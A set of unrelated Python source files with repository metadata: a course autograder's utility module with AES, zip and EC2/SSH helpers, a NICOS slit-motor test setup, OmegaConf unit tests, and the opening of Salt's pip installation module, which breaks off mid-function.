d55712f0c4c674bb0c34d5842cdb03b85422bc19 | 7,460 | py | Python | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | grading/utils.py | cc3-ug/lab03-2022 | a0bf2ae52185aa3070d9bcc5d1d349377371884f | [
"MIT"
] | null | null | null | import os
import re
import json
import boto3
import base64
import shutil
import hashlib
import zipfile
import paramiko
import tempfile
import pycparser
from os import environ
from glob import glob
from Crypto import Random
from subprocess import run
from subprocess import PIPE
from tabulate import tabulate
from Crypto.Cipher import AES
from distutils.dir_util import copy_tree
# encrypt a string
def encrypt(raw):
  """AES-256-CBC encrypt `raw`; returns base64(iv + ciphertext) as str.

  The key is SHA256 of the AUTOGRADERS_KEY environment variable and the
  plaintext is padded PKCS#7-style to the 16-byte block size.
  """
  key = hashlib.sha256(environ['AUTOGRADERS_KEY'].encode()).digest()
  pad_len = 16 - len(raw) % 16
  padded = raw + pad_len * chr(pad_len)
  iv = Random.new().read(AES.block_size)
  cipher = AES.new(key, AES.MODE_CBC, iv)
  return base64.b64encode(iv + cipher.encrypt(padded)).decode()
# decrypt an encrypted string
def decrypt(enc):
  """Reverse of encrypt(): base64-decode, AES-CBC decrypt, strip padding."""
  blob = base64.b64decode(enc)
  iv, body = blob[:16], blob[16:]
  key = hashlib.sha256(environ['AUTOGRADERS_KEY'].encode()).digest()
  cipher = AES.new(key, AES.MODE_CBC, iv)
  plain = cipher.decrypt(body)
  # Last byte is the pad length; it arrives as an int for py3 bytes or
  # as a 1-char string otherwise.
  pad = plain[-1]
  if type(pad) == int:
    plain = plain[0: -pad]
  else:
    plain = plain[0: -ord(pad)]
  return plain.decode()
# reads a file
def read(filename):
  """Return the whitespace-stripped text content of `filename`.

  Fix: use a `with` block so the handle is closed even when .read()
  raises (the old manual open/close leaked the handle on error).
  """
  with open(filename, 'r') as f:
    text = f.read()
  return text.strip()
# writes json
def write_json(data, filename):
  """Serialize `data` as JSON into `filename`, overwriting any content.

  Fix: `with` guarantees flush/close even if serialization raises.
  """
  with open(filename, 'w') as f:
    f.write(json.dumps(data))
# reads a json
def read_json(filename):
  """Load and return the JSON document stored in `filename`.

  Fix: `with` closes the handle even when reading/parsing raises.
  """
  with open(filename, 'r') as f:
    text = f.read()
  return json.loads(text)
# parse a json string
def parse_json(text):
  """Deserialize a JSON document given as a string."""
  parsed = json.loads(text)
  return parsed
# extracts a zip file to a directory:
def extract_to(file, to, delete=False):
  """Extract zip archive `file` into directory `to`.

  When `delete` is true the archive is removed after extraction.

  Fix: the ZipFile is used as a context manager so the handle is closed
  even when extractall() raises (the old code leaked it on error).
  """
  with zipfile.ZipFile(file, 'r') as zip_ref:
    zip_ref.extractall(to)
  if delete:
    os.remove(file)
# join paths
def join(*args):
  """Thin convenience wrapper over os.path.join."""
  joined = os.path.join(*args)
  return joined
# creates a temp directory
def tempdir(prefix='cc-3-temp', suffix=''):
  """Create a new temporary directory and return its path."""
  return tempfile.mkdtemp(suffix=suffix, prefix=prefix)
# copy files from one dir to another
def copy_files(dirfrom, dirto):
  """Copy every entry of `dirfrom` into `dirto` (directories recursively).

  A missing source directory is a silent no-op.
  """
  if not os.path.exists(dirfrom):
    return
  for entry in glob(os.path.join(dirfrom, '*')):
    if os.path.isdir(entry):
      copy_tree(entry, os.path.join(dirto, os.path.basename(entry)))
    else:
      shutil.copy2(entry, dirto)
# copy file to a dir
def copy_file(filename, dirto):
  """Copy one file into directory `dirto`; missing source is a no-op."""
  if not os.path.exists(filename):
    return
  shutil.copy2(filename, dirto)
# lists all files in dir
def ls(dir='.', files=None):
  """Recursively list every file (not directory) under `dir`.

  `files` is the shared accumulator used by the recursive calls;
  callers normally omit it.

  Fix: the old default `files=[]` was a shared mutable default, so
  every call without an explicit list kept appending to the SAME list —
  repeated ls() calls returned accumulated results from earlier calls.
  """
  if files is None:
    files = []
  for e in glob(os.path.join(dir, '*')):
    if os.path.isdir(e):
      ls(dir=e, files=files)
    else:
      files.append(e)
  return files
# fix ownership
def fix_ownership():
  """Re-own everything under the CWD to the CWD's own uid/gid.

  Only effective when running as root (only root may chown to another
  user).  Fix: the original guarded the euid only on the file loop and
  not on the directory loop, so non-root runs raised PermissionError on
  directories they did not own; the check is hoisted to cover both.
  """
  statinfo = os.stat(os.getcwd())
  if os.geteuid() != 0:
    return
  for f in ls():
    os.chown(f, statinfo.st_uid, statinfo.st_gid)
  for f in os.listdir(os.getcwd()):
    if os.path.isdir(f):
      os.chown(f, statinfo.st_uid, statinfo.st_gid)
# removes a directory
def delete_dir(dir):
  """Recursively remove directory `dir` and everything inside it."""
  shutil.rmtree(dir)
# removes a file
def delete_file(f):
  """Remove the single file `f`."""
  os.remove(f)
# expected files
def expected_files(files, dir='.'):
  """Return the subset of `files` that is NOT present under `dir`.

  Order (and duplicates) of `files` are preserved.  Improvement: the
  directory listing is turned into a set so each membership test is
  O(1) instead of a linear scan of the whole listing.
  """
  present = set(ls(dir=dir))
  return [f for f in files if f not in present]
# executes a shell command
def execute(cmd=[], shell=False, dir='.', input=None, encoding='ascii', timeout=5):
  """Run `cmd` in directory `dir`, capturing stdout/stderr as bytes.

  Returns the CompletedProcess.  NOTE(review): the `encoding` parameter
  is accepted but never forwarded to run() — callers get raw bytes.
  """
  completed = run(cmd, shell=shell, stdout=PIPE, stderr=PIPE, input=input, cwd=dir, timeout=timeout)
  return completed
# makes a target
def make(target=''):
  """Invoke `make <target>` in the current working directory."""
  cmd = ['make', target]
  return execute(cmd=cmd)
# parses a form
def parse_form(f):
  """Parse a grading-form file into a {question_number: answer} dict.

  Only lines shaped like ``<digits> : <letters/digits/commas>`` are
  kept; everything else is ignored.  The file is read as latin1.

  Fix: the file handle was never closed (no close() and no `with`);
  wrap the read in a context manager.
  """
  pattern = re.compile(r'^[0-9]+( )*:[a-zA-Z0-9, ]+$')
  lookup = {}
  with open(f, 'r', encoding='latin1') as form:
    for line in form:
      line = line.strip()
      if pattern.search(line) is not None:
        vals = line.split(':')
        lookup[vals[0].strip()] = vals[1].strip()
  return lookup
# parses a c c99 file
def parse_c(filename):
  """Build `filename`_conv.c via make, then parse it with pycparser.

  Blank lines and preprocessor-directive lines are stripped before the
  text is handed to the C99 parser.

  Fixes: removed two leftover debug print() statements and switched to
  a `with` block so the handle is closed even if reading raises.
  """
  make(target=filename + '_conv.c')
  directive = re.compile(r'(\w)*#.*')
  text = ''
  with open(filename + '_conv.c', 'r') as f:
    for line in f:
      line = line.strip('\n')
      if line == '':
        continue
      if directive.search(line):
        continue
      text += line + '\n'
  parser = pycparser.c_parser.CParser()
  return parser.parse(text)
# parses a c c99 file
def parse_c_raw(filename):
  """Parse `filename`.c with pycparser after running gcc's preprocessor.

  Blank lines and non-#pragma preprocessor directives are dropped, the
  remainder is written to a scratch ``temp.c`` and piped through
  ``gcc -E`` before parsing.

  Fixes: file handles are managed with `with` blocks, and the scratch
  file is removed in a `finally` so it is not leaked when gcc fails or
  times out (the old `rm` call was skipped on exception).
  """
  directive = re.compile(r'(\w)*#.*')
  text = ''
  with open(filename + '.c', 'r') as f:
    for line in f:
      line = line.strip()
      if line == '':
        continue
      if directive.search(line) and 'pragma' not in line.lower():
        continue
      text += line + '\n'
  with open('temp.c', 'w') as f:
    f.write(text)
  try:
    task = execute(cmd=['gcc', '-E', 'temp.c'], timeout=30)
  finally:
    os.remove('temp.c')
  text = task.stdout.decode().strip()
  parser = pycparser.c_parser.CParser()
  return parser.parse(text)
# passed message
def passed(*args):
  """Return 'passed', or 'passed: <detail>' when a detail is given."""
  if args:
    return 'passed: ' + args[0]
  return 'passed'
# failed message
def failed(*args):
  """Return 'failed', or 'failed: <detail>' when a detail is given."""
  if args:
    return 'failed: ' + args[0]
  return 'failed'
# incomplete message
def incomplete(*args):
  """Return 'incomplete', or 'incomplete: <detail>' when a detail is given."""
  if args:
    return 'incomplete: ' + args[0]
  return 'incomplete'
# creates a compilation error msg
def create_error(filename, msg):
  """Format a compilation-error report; an empty msg yields ''."""
  if msg == '':
    return ''
  return '[%s]\n\n%s\n' % (filename, msg)
# creates a pretty result report
def report(table):
  """Render grading rows as a pretty text table."""
  headers = ['Exercise', 'Grade', 'Message']
  return tabulate(table, headers=headers)
# writes autograder result
def write_result(grade, msg):
  """Persist the autograder outcome to output.json in the CWD."""
  result = {'grade': grade, 'output': msg}
  write_json(result, 'output.json')
# finds a specific function in the ast
def find_func(ast, name):
  """Return the FuncDef node called `name` from a pycparser AST, or None."""
  matches = (
    node for node in ast.ext
    if type(node) == pycparser.c_ast.FuncDef and node.decl.name == name
  )
  return next(matches, None)
class AWSTask:
  """Launch, command over SSH, and terminate a single EC2 instance.

  NOTE(review): the AMI id, security-group id and key name are
  hard-coded to one AWS account/region — confirm before reuse.
  """
  def __init__(self, name, instance='c5.2xlarge', AMI='ami-0e262d4de9c0b73fd', key='cc3'):
    # Spin up exactly one instance tagged with `name`.
    ec2 = boto3.resource('ec2')
    self.instance = ec2.create_instances(
      ImageId=AMI,
      MaxCount=1,
      MinCount=1,
      InstanceType=instance,
      SecurityGroupIds=['sg-00b6ec171be0d43f7'],
      KeyName=key,
      TagSpecifications=[
        {
          'ResourceType': 'instance',
          'Tags': [
            {
              'Key': 'Name',
              'Value': name
            },
          ]
        },
      ],
    )[0]
    # Wait, reload attributes (public IP appears only after running),
    # then wait again to be safe.
    self.instance.wait_until_running()
    self.instance.reload()
    self.instance.wait_until_running()
    self.key = key
    self.ipv4 = self.instance.public_ip_address
  def connect(self):
    # Open an SSH session using <key>.pem from the current directory.
    key = paramiko.RSAKey.from_private_key_file(self.key + '.pem')
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname=self.ipv4, username='ubuntu', pkey=key)
    self.client = client
  def run(self, cmd, timeout=30):
    # Execute `cmd` remotely; returns (stdout, stderr) as decoded text.
    # Requires connect() to have been called first.
    stdin, stdout, stderr = self.client.exec_command(cmd, timeout=timeout)
    return (stdout.read().decode(), stderr.read().decode())
  def terminate(self):
    # Terminate (not just stop) the instance.
    self.instance.terminate()
| 24.299674 | 97 | 0.587668 |
e09d6c9558303704e36c4b1d75e8a5e962464c47 | 3,835 | py | Python | test/setups/custom/sinq_amor_diaphragms.py | mlz-ictrl/nicos | a6de0bc194ba42e3dc04a033713b41b5499ba8e1 | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | test/setups/custom/sinq_amor_diaphragms.py | ess-dmsc/nicos | 755d61d403ff7123f804c45fc80c7ff4d762993b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | test/setups/custom/sinq_amor_diaphragms.py | mlz-ictrl/nicos | a6de0bc194ba42e3dc04a033713b41b5499ba8e1 | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Various devices for diaphragms in AMOR'
devices = dict(
xs = device('test.utils.TestDevice',
description = 'xs motor',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1t = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 top',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1b = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 bottom',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1r = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 right',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d1l = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 1 left',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
slit1 = device('nicos.devices.generic.slit.Slit',
description = 'Slit 1 with left, right, bottom and top motors',
opmode = '4blades',
left = 'd1l',
right = 'd1r',
top = 'd1t',
bottom = 'd1b',
),
d2t = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 top',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2b = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 bottom',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2r = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 right',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2l = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 left',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
d2z = device('nicos.devices.generic.VirtualMotor',
description = 'Slit 2 z',
precision = .1,
unit = 'mm',
abslimits = (-20, 20),
),
slit2 = device('nicos.devices.generic.slit.Slit',
description = 'Slit 2 with left, right, bottom and top motors',
opmode = '4blades',
left = 'd2l',
right = 'd2r',
top = 'd2t',
bottom = 'd2b',
),
controller_slm = device('nicos_sinq.amor.devices.slit.AmorSlitHandler',
description = 'Logical motors controller',
xs = 'xs',
slit1 = 'slit1',
slit2 = 'slit2',
lowlevel = True
),
div = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor vertical divergence',
motortype = 'div',
controller = 'controller_slm',
unit = 'mm'
),
did = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor ',
motortype = 'did',
controller = 'controller_slm',
unit = 'mm'
),
dih = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor horizontal divergence',
motortype = 'dih',
controller = 'controller_slm',
unit = 'mm'
),
d2v = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor vertical divergence',
motortype = 'd2v',
controller = 'controller_slm',
unit = 'mm'
),
d2d = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor ',
motortype = 'd2d',
controller = 'controller_slm',
unit = 'mm'
),
d2h = device('nicos_sinq.amor.devices.slit.AmorSlitLogicalMotor',
description = 'Logical motor horizontal divergence',
motortype = 'd2h',
controller = 'controller_slm',
unit = 'mm'
),
)
| 30.927419 | 75 | 0.549413 |
eb3962289f4b9202c40d4c9c1bc0627ece26e3c0 | 11,634 | py | Python | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | tests/test_omegaconf.py | anthonytec2/omegaconf | 9a9c662a441ff828eadbfcd6fbf9e307439a93fd | [
"BSD-3-Clause"
] | null | null | null | from typing import Any
import pytest
from pytest import raises
from omegaconf import (
MISSING,
BooleanNode,
DictConfig,
EnumNode,
FloatNode,
IntegerNode,
ListConfig,
MissingMandatoryValue,
OmegaConf,
StringNode,
)
from omegaconf.errors import UnsupportedInterpolationType
from . import Color, ConcretePlugin, IllegalType, StructuredWithMissing, does_not_raise
# Each case: (config, key, expected is_missing flag, expected error on access).
@pytest.mark.parametrize(  # type: ignore
    "cfg, key, expected_is_missing, expectation",
    [
        ({}, "foo", False, does_not_raise()),
        ({"foo": True}, "foo", False, does_not_raise()),
        ({"foo": MISSING}, "foo", True, raises(MissingMandatoryValue)),
        (
            {"foo": "${bar}", "bar": MISSING},
            "foo",
            True,
            raises(MissingMandatoryValue),
        ),
        (
            {"foo": "${unknown_resolver:foo}"},
            "foo",
            False,
            raises(UnsupportedInterpolationType),
        ),
        ({"foo": StringNode(value="???")}, "foo", True, raises(MissingMandatoryValue)),
        (
            {"foo": StringNode(value="???"), "inter": "${foo}"},
            "inter",
            True,
            raises(MissingMandatoryValue),
        ),
        (StructuredWithMissing, "num", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "opt_num", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "dict", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "opt_dict", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "list", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "opt_list", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "user", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "opt_user", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "inter_user", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "inter_opt_user", True, raises(MissingMandatoryValue)),
        (StructuredWithMissing, "inter_num", True, raises(MissingMandatoryValue)),
    ],
)
def test_is_missing(
    cfg: Any, key: str, expected_is_missing: bool, expectation: Any
) -> None:
    """is_missing() must be stable across struct and read-only flags."""
    cfg = OmegaConf.create(cfg)
    with expectation:
        cfg.get(key)
    assert OmegaConf.is_missing(cfg, key) == expected_is_missing
    OmegaConf.set_struct(cfg, True)
    assert OmegaConf.is_missing(cfg, key) == expected_is_missing
    OmegaConf.set_readonly(cfg, True)
    assert OmegaConf.is_missing(cfg, key) == expected_is_missing
def test_is_missing_resets() -> None:
    """Assigning a concrete value clears MISSING; '???' restores it."""
    cfg = OmegaConf.structured(StructuredWithMissing)

    def missing(key: str) -> bool:
        return OmegaConf.is_missing(cfg, key)

    assert missing("dict")
    cfg.dict = {}
    assert not missing("dict")

    assert missing("list")
    cfg.list = [1, 2, 3]
    assert not missing("list")
    cfg.list = "???"
    assert missing("list")
# Only actual Config containers (DictConfig/ListConfig) count as "config".
@pytest.mark.parametrize(  # type: ignore
    "cfg, expected",
    [
        (None, False),
        ({}, False),
        ([], False),
        ("aa", False),
        (10, False),
        (True, False),
        (bool, False),
        (StringNode("foo"), False),
        (ConcretePlugin, False),
        (ConcretePlugin(), False),
        (OmegaConf.create({}), True),
        (OmegaConf.create([]), True),
        (OmegaConf.structured(ConcretePlugin), True),
        (OmegaConf.structured(ConcretePlugin()), True),
    ],
)
def test_is_config(cfg: Any, expected: bool) -> None:
    """OmegaConf.is_config() recognizes config objects and nothing else."""
    assert OmegaConf.is_config(cfg) == expected
# Only a ListConfig counts as a list; dict-shaped configs do not.
@pytest.mark.parametrize(  # type: ignore
    "cfg, expected",
    [
        (None, False),
        ({}, False),
        ([], False),
        ("aa", False),
        (10, False),
        (True, False),
        (bool, False),
        (StringNode("foo"), False),
        (ConcretePlugin, False),
        (ConcretePlugin(), False),
        (OmegaConf.create({}), False),
        (OmegaConf.create([]), True),
        (OmegaConf.structured(ConcretePlugin), False),
        (OmegaConf.structured(ConcretePlugin()), False),
    ],
)
def test_is_list(cfg: Any, expected: bool) -> None:
    """OmegaConf.is_list() is true only for ListConfig instances."""
    assert OmegaConf.is_list(cfg) == expected
# DictConfig (including structured configs) counts as a dict.
@pytest.mark.parametrize(  # type: ignore
    "cfg, expected",
    [
        (None, False),
        ({}, False),
        ([], False),
        ("aa", False),
        (10, False),
        (True, False),
        (bool, False),
        (StringNode("foo"), False),
        (ConcretePlugin, False),
        (ConcretePlugin(), False),
        (OmegaConf.create({}), True),
        (OmegaConf.create([]), False),
        (OmegaConf.structured(ConcretePlugin), True),
        (OmegaConf.structured(ConcretePlugin()), True),
    ],
)
def test_is_dict(cfg: Any, expected: bool) -> None:
    """OmegaConf.is_dict() is true only for DictConfig instances."""
    assert OmegaConf.is_dict(cfg) == expected
# Cross-product: every node type x {optional, required}; each factory
# builds a node that is either populated or MISSING.
@pytest.mark.parametrize(  # type: ignore
    "is_optional", [True, False]
)
@pytest.mark.parametrize(  # type: ignore
    "fac",
    [
        (
            lambda is_optional, missing: StringNode(
                value="foo" if not missing else "???", is_optional=is_optional
            )
        ),
        (
            lambda is_optional, missing: IntegerNode(
                value=10 if not missing else "???", is_optional=is_optional
            )
        ),
        (
            lambda is_optional, missing: FloatNode(
                value=10 if not missing else "???", is_optional=is_optional
            )
        ),
        (
            lambda is_optional, missing: BooleanNode(
                value=True if not missing else "???", is_optional=is_optional
            )
        ),
        (
            lambda is_optional, missing: EnumNode(
                enum_type=Color,
                value=Color.RED if not missing else "???",
                is_optional=is_optional,
            )
        ),
        (
            lambda is_optional, missing: ListConfig(
                content=[1, 2, 3] if not missing else "???", is_optional=is_optional
            )
        ),
        (
            lambda is_optional, missing: DictConfig(
                content={"foo": "bar"} if not missing else "???",
                is_optional=is_optional,
            )
        ),
        (
            lambda is_optional, missing: DictConfig(
                ref_type=ConcretePlugin,
                content=ConcretePlugin() if not missing else "???",
                is_optional=is_optional,
            )
        ),
    ],
)
def test_is_optional(fac: Any, is_optional: bool) -> None:
    """is_optional() matches the node's flag whether populated or missing."""
    obj = fac(is_optional, False)
    assert OmegaConf.is_optional(obj) == is_optional
    cfg = OmegaConf.create({"node": obj})
    assert OmegaConf.is_optional(cfg, "node") == is_optional
    obj = fac(is_optional, True)
    assert OmegaConf.is_optional(obj) == is_optional
    cfg = OmegaConf.create({"node": obj})
    assert OmegaConf.is_optional(cfg, "node") == is_optional
# Each factory builds an optional node holding either a value or None.
@pytest.mark.parametrize(  # type: ignore
    "is_none", [True, False]
)
@pytest.mark.parametrize(  # type: ignore
    "fac",
    [
        (lambda none: StringNode(value="foo" if not none else None, is_optional=True)),
        (lambda none: IntegerNode(value=10 if not none else None, is_optional=True)),
        (lambda none: FloatNode(value=10 if not none else None, is_optional=True)),
        (lambda none: BooleanNode(value=True if not none else None, is_optional=True)),
        (
            lambda none: EnumNode(
                enum_type=Color,
                value=Color.RED if not none else None,
                is_optional=True,
            )
        ),
        (
            lambda none: ListConfig(
                content=[1, 2, 3] if not none else None, is_optional=True
            )
        ),
        (
            lambda none: DictConfig(
                content={"foo": "bar"} if not none else None, is_optional=True,
            )
        ),
        (
            lambda none: DictConfig(
                ref_type=ConcretePlugin,
                content=ConcretePlugin() if not none else None,
                is_optional=True,
            )
        ),
    ],
)
def test_is_none(fac: Any, is_none: bool) -> None:
    """is_none() reports None-ness both standalone and inside a config."""
    obj = fac(is_none)
    assert OmegaConf.is_none(obj) == is_none
    cfg = OmegaConf.create({"node": obj})
    assert OmegaConf.is_none(cfg, "node") == is_none
# Each factory builds a node holding a plain value (inter=None) or the
# given interpolation string.
@pytest.mark.parametrize(
    "fac",  # type: ignore
    [
        (
            lambda inter: StringNode(
                value="foo" if inter is None else inter, is_optional=True
            )
        ),
        (
            lambda inter: IntegerNode(
                value=10 if inter is None else inter, is_optional=True
            )
        ),
        (
            lambda inter: FloatNode(
                value=10 if inter is None else inter, is_optional=True
            )
        ),
        (
            lambda inter: BooleanNode(
                value=True if inter is None else inter, is_optional=True
            )
        ),
        (
            lambda inter: EnumNode(
                enum_type=Color,
                value=Color.RED if inter is None else inter,
                is_optional=True,
            )
        ),
        (
            lambda inter: ListConfig(
                content=[1, 2, 3] if inter is None else inter, is_optional=True
            )
        ),
        (
            lambda inter: DictConfig(
                content={"foo": "bar"} if inter is None else inter, is_optional=True,
            )
        ),
        (
            lambda inter: DictConfig(
                ref_type=ConcretePlugin,
                content=ConcretePlugin() if inter is None else inter,
                is_optional=True,
            )
        ),
    ],
    ids=[
        "StringNode",
        "IntegerNode",
        "FloatNode",
        "BooleanNode",
        "EnumNode",
        "ListConfig",
        "DictConfig",
        "ConcretePlugin",
    ],
)
def test_is_interpolation(fac):
    """Plain values are not interpolations; ${...} strings are."""
    obj = fac(inter=None)
    assert not OmegaConf.is_interpolation(obj)
    cfg = OmegaConf.create({"node": obj})
    assert not OmegaConf.is_interpolation(cfg, "node")
    assert not OmegaConf.is_interpolation(cfg, "missing")
    for inter in ["${foo}", "http://${url}", "${resolver:value}"]:
        obj = fac(inter=inter)
        assert OmegaConf.is_interpolation(obj)
        cfg = OmegaConf.create({"node": obj})
        assert OmegaConf.is_interpolation(cfg, "node")
# (config contents, expected Python type reported for key "foo").
@pytest.mark.parametrize(  # type: ignore
    "cfg, type_",
    [
        ({"foo": 10}, int),
        ({"foo": 10.0}, float),
        ({"foo": True}, bool),
        ({"foo": "bar"}, str),
        ({"foo": None}, type(None)),
        ({"foo": ConcretePlugin()}, ConcretePlugin),
        ({"foo": ConcretePlugin}, ConcretePlugin),
        ({"foo": {}}, dict),
        ({"foo": OmegaConf.create()}, dict),
        ({"foo": []}, list),
        ({"foo": OmegaConf.create([])}, list),
    ],
)
def test_get_type(cfg: Any, type_: Any) -> None:
    """get_type(cfg, key) reports the underlying type of the node's value."""
    cfg = OmegaConf.create(cfg)
    assert OmegaConf.get_type(cfg, "foo") == type_
# get_type() also works on raw (non-config) objects.
@pytest.mark.parametrize(  # type: ignore
    "obj, type_",
    [
        (10, int),
        (10.0, float),
        (True, bool),
        ("foo", str),
        (DictConfig(content={}), dict),
        (ListConfig(content=[]), list),
        (IllegalType, IllegalType),
        (IllegalType(), IllegalType),
    ],
)
def test_get_type_on_raw(obj: Any, type_: Any) -> None:
    """get_type(obj) on raw values mirrors their Python type."""
    assert OmegaConf.get_type(obj) == type_
def test_is_issubclass() -> None:
    """get_type() on a structured config returns the backing dataclass type."""
    cfg = OmegaConf.structured(ConcretePlugin)
    underlying = OmegaConf.get_type(cfg)
    assert underlying is not None
    assert issubclass(underlying, ConcretePlugin)
| 30.296875 | 87 | 0.556558 |
2f453c0e71600727ca79d3263d5fd071961a01fc | 15,138 | py | Python | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | 1 | 2017-09-09T11:21:13.000Z | 2017-09-09T11:21:13.000Z | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | null | null | null | salt/modules/pip.py | abh/salt | e8870573a2d3eca1a7794ce8340797fa487de04d | [
"Apache-2.0"
] | null | null | null | '''
Install Python packages with pip to either the system or a virtualenv
'''
# Import Python libs
import os
import logging
import tempfile
import shutil
# Import Salt libs
from salt.exceptions import CommandExecutionError, CommandNotFoundError
# It would be cool if we could use __virtual__() in this module, though, since
# pip can be installed on a virtualenv anywhere on the filesystem, there's no
# definite way to tell if pip is installed on not.
logger = logging.getLogger(__name__)
def _get_pip_bin(bin_env):
    '''
    Return the pip command to call, either from a virtualenv, an argument
    passed in, or from the global modules options
    '''
    # No environment given: fall back to whatever pip binary is on PATH.
    if not bin_env:
        which_result = __salt__['cmd.which_bin'](['pip2', 'pip', 'pip-python'])
        if which_result is None:
            raise CommandNotFoundError('Could not find a `pip` binary')
        return which_result
    # A directory is taken to be a virtualenv: look for its bin/pip.
    if os.path.isdir(bin_env):
        pip_bin = os.path.join(bin_env, 'bin', 'pip')
        if not os.path.isfile(pip_bin):
            raise CommandNotFoundError('Could not find a `pip` binary')
        return pip_bin
    # Otherwise bin_env is assumed to be the pip binary itself.
    return bin_env
def install(pkgs=None,
            requirements=None,
            env=None,
            bin_env=None,
            log=None,
            proxy=None,
            timeout=None,
            editable=None,
            find_links=None,
            index_url=None,
            extra_index_url=None,
            no_index=False,
            mirrors=None,
            build=None,
            target=None,
            download=None,
            download_cache=None,
            source=None,
            upgrade=False,
            force_reinstall=False,
            ignore_installed=False,
            no_deps=False,
            no_install=False,
            no_download=False,
            install_options=None,
            runas=None,
            cwd=None):
    '''
    Install packages with pip

    Install packages individually or from a pip requirements file. Install
    packages globally or to a virtualenv.

    pkgs
        comma separated list of packages to install
    requirements
        path to requirements
    bin_env
        path to pip bin or path to virtualenv. If doing a system install,
        and want to use a specific pip bin (pip-2.7, pip-2.6, etc..) just
        specify the pip bin you want.
        If installing into a virtualenv, just use the path to the virtualenv
        (/home/code/path/to/virtualenv/)
    env
        deprecated, use bin_env now
    log
        Log file where a complete (maximum verbosity) record will be kept
    proxy
        Specify a proxy in the form
        user:passwd@proxy.server:port. Note that the
        user:password@ is optional and required only if you
        are behind an authenticated proxy. If you provide
        user@proxy.server:port then you will be prompted for a
        password.
    timeout
        Set the socket timeout (default 15 seconds)
    editable
        install something editable(ie git+https://github.com/worldcompany/djangoembed.git#egg=djangoembed)
    find_links
        URL to look for packages at
    index_url
        Base URL of Python Package Index
    extra_index_url
        Extra URLs of package indexes to use in addition to ``index_url``
    no_index
        Ignore package index
    mirrors
        Specific mirror URLs to query (automatically adds --use-mirrors)
    build
        Unpack packages into ``build`` dir
    target
        Install packages into ``target`` dir
    download
        Download packages into ``download`` instead of installing them
    download_cache
        Cache downloaded packages in ``download_cache`` dir
    source
        Check out ``editable`` packages into ``source`` dir
    upgrade
        Upgrade all packages to the newest available version
    force_reinstall
        When upgrading, reinstall all packages even if they are already up-to-date.
    ignore_installed
        Ignore the installed packages (reinstalling instead)
    no_deps
        Ignore package dependencies
    no_install
        Download and unpack all packages, but don't actually install them
    no_download
        Don't download any packages, just install the ones
        already downloaded (completes an install run with
        --no-install)
    install_options
        Extra arguments to be supplied to the setup.py install
        command (use like --install-option="--install-
        scripts=/usr/local/bin"). Use multiple --install-
        option options to pass multiple options to setup.py
        install. If you are using an option with a directory
        path, be sure to use absolute path.
    runas
        User to run pip as
    cwd
        Current working directory to run pip from

    CLI Example::

        salt '*' pip.install <package name>,<package2 name>
        salt '*' pip.install requirements=/path/to/requirements.txt
        salt '*' pip.install <package name> bin_env=/path/to/virtualenv
        salt '*' pip.install <package name> bin_env=/path/to/pip_bin

    Complicated CLI example::

        salt '*' pip.install markdown,django editable=git+https://github.com/worldcompany/djangoembed.git#egg=djangoembed upgrade=True no_deps=True
    '''
    # Switching from using `pip_bin` and `env` to just `bin_env`
    # cause using an env and a pip bin that's not in the env could
    # be problematic.
    # Still using the `env` variable, for backwards compatiblity sake
    # but going fwd you should specify either a pip bin or an env with
    # the `bin_env` argument and we'll take care of the rest.
    if env and not bin_env:
        bin_env = env

